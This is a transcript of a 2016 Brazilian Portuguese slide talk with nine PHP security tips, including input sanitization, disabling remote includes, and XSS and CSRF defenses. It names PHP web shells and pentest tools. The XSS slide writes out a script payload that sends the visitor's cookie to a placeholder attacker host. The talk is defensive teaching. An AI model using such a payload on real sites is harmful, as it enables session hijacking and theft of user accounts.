Dicas de segurança para o PHP e seus amigos
29
Dicas de segurança para o PHP e seus amigos 7º PHPMG TALKS - 2016
-
Upload
joubert-guimaraes-de-assis-redrat -
Category
Technology
-
view
263 -
download
0
Transcript of Dicas de segurança para o PHP e seus amigos
Dicas de segurança para o PHP e seus amigos7º PHPMG TALKS - 2016
Eu? Sou este ai
https://github.com/joubertredrat
https://br.linkedin.com/in/joubertredrat
https://twitter.com/joubertredrat
http://www.vivaolinux.com.br/~joubertredrat* no meu Linkedin explica o porque do apelido RedRat
https://creativecommons.org/licenses/by-sa/4.0/
Dicas de segurança para o PHP e seus amigos
Dicas de segurança para o PHP e seus amigos
INFORMAÇÃO É PODER
QUEM TEM INFORMAÇÃO DOMINA O MUNDO
Dicas de segurança para o PHP e seus amigos
1ª DICA
REMOVER INFORMAÇÕES DESNECESSÁRIAS
Dicas de segurança para o PHP e seus amigos
1ª DICA - REMOVER INFORMAÇÕES DESNECESSÁRIAS
Dicas de segurança para o PHP e seus amigos
1ª DICA - REMOVER INFORMAÇÕES DESNECESSÁRIAS
Dicas de segurança para o PHP e seus amigos
2ª DICA
ISOLAR SUAS APLICAÇÕES, SITES OU SISTEMAS
Dicas de segurança para o PHP e seus amigos
2ª DICA - ISOLAR SUAS APLICAÇÕES, SITES OU SISTEMAS
Dicas de segurança para o PHP e seus amigos
3ª DICA
DESABILITAR OU EVITAR RECURSOS EXTERNOS
Dicas de segurança para o PHP e seus amigos
3ª DICA - DESABILITAR OU EVITAR RECURSOS EXTERNOS
R57 R6
C99Shell C100Shell
bypass Tool25
b374k
GaZa
Dicas de segurança para o PHP e seus amigos
3ª DICA - DESABILITAR OU EVITAR RECURSOS EXTERNOS
http://php.net/allow-url-include
Dicas de segurança para o PHP e seus amigos
4ª DICA
USAR URL AMIGÁVEIS E EVITAR QUERY STRING
Dicas de segurança para o PHP e seus amigos
4ª DICA - USAR URL AMIGÁVEIS E EVITAR QUERY STRING
Dicas de segurança para o PHP e seus amigos
5ª DICA
TRATAR OS DADOS VINDOS DO USUÁRIO
MESMO ASSIM QUER USAR QUERY STRING?
4ª DICA - USAR URL AMIGÁVEIS E EVITAR QUERY STRING
Dicas de segurança para o PHP e seus amigos
5ª DICA - TRATAR OS DADOS VINDOS DO USUÁRIO
filter_var
mysqli_stmt_bind_param
PDOStatement::bindValue
DateTime::getLastErrors();
is_(bool,callable,numeric,float,string,object,etc)
Libs no Packagist
Dicas de segurança para o PHP e seus amigos
5ª DICA - TRATAR OS DADOS VINDOS DO USUÁRIO
Quer fazer testes?
sqlmap Zed Attack Proxy “ZAP”
BeEF sqlninja
Dicas de segurança para o PHP e seus amigos
6ª DICA
EVITAR O USO DA PRIMARY KEY OU ID
Dicas de segurança para o PHP e seus amigos
6ª DICA - EVITAR O USO DA PRIMARY KEY OU ID
• UUID• GUID• MD5/CRC32/SHA1/SHA256• Hash ou Ofuscamento
Dicas de segurança para o PHP e seus amigos
6ª DICA - EVITAR O USO DA PRIMARY KEY OU ID
Dicas de segurança para o PHP e seus amigos
7ª DICA (PRIMA DA 5ª DICA)
CROSS-SITE SCRIPTING
Dicas de segurança para o PHP e seus amigos
7ª DICA - CROSS-SITE SCRIPTING
Dicas de segurança para o PHP e seus amigos
7ª DICA - CROSS-SITE SCRIPTING
Dicas de segurança para o PHP e seus amigos
7ª DICA - CROSS-SITE SCRIPTING
Dicas de segurança para o PHP e seus amigos
7ª DICA - CROSS-SITE SCRIPTING
results.php?q=<script>window.open("http://site.do.mal/get.php?cookie=" + document.cookie, "_blank");</script>
Dicas de segurança para o PHP e seus amigos
8ª DICA
CROSS SITE REQUEST FORGERY
Dicas de segurança para o PHP e seus amigos
8ª DICA - CROSS SITE REQUEST FORGERY
Dicas de segurança para o PHP e seus amigos
9ª DICA
USAR CHECKSUM OU O VCS AO SEU FAVOR
Dicas de segurança para o PHP e seus amigos
9ª DICA - USAR CHECKSUM OU O VCS AO SEU FAVOR
Dicas de segurança para o PHP e seus amigos
ACABOU AS DICAS POR HOJE
PERGUNTAS?
FALA QUE NÃO TEM
![PHP Experience 2016 - [Palestra] Keynote: PHP-7](https://static.fdocumentos.tips/doc/165x107/58a068a61a28ab06528b55ed/php-experience-2016-palestra-keynote-php-7.jpg)
![PHP Experience 2016 - [Palestra] Rumo à Certificação PHP](https://static.fdocumentos.tips/doc/165x107/588911c01a28ab4a5c8b5ba3/php-experience-2016-palestra-rumo-a-certificacao-php.jpg)
